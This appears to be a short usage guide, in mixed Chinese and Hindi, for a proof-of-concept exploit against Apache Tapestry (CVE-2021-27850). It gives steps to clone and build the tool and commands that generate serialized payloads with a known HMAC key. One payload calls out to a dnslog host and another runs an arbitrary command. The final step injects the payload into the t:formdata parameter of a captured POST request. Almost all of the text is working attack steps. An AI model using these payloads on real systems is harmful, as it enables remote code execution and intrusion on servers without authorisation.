
Apache Tapestry CVE-2021-27850 PoC
git clone https://github.com/Ovi3/CVE_2021_27850_POC.git
cd CVE_2021_27850_POC/
gradlew runnbaleJar
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar
[Usage]:
java TapestryExploit [Tapestry Key] DNS [URL]
java TapestryExploit [Tapestry Key] CB2 [Command]
# 假设 hmac key为 change this immediately
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar "change this immediately" DNS "http://xxx.dnslog.cn"
java -jar ./build/libs/CVE_2021_27850_POC-1.0-SNAPSHOT.jar "change this immediately" CB2 "calc"
Tapestry एप्लिकेशन तक पहुँचें, एक POST अनुरोध (जैसे लॉगिन अनुरोध) ट्रिगर करें, पैकेट कैप्चर करें, और t:formdata पैरामीटर के मान को ऊपर जनरेट किए गए payload में बदलें।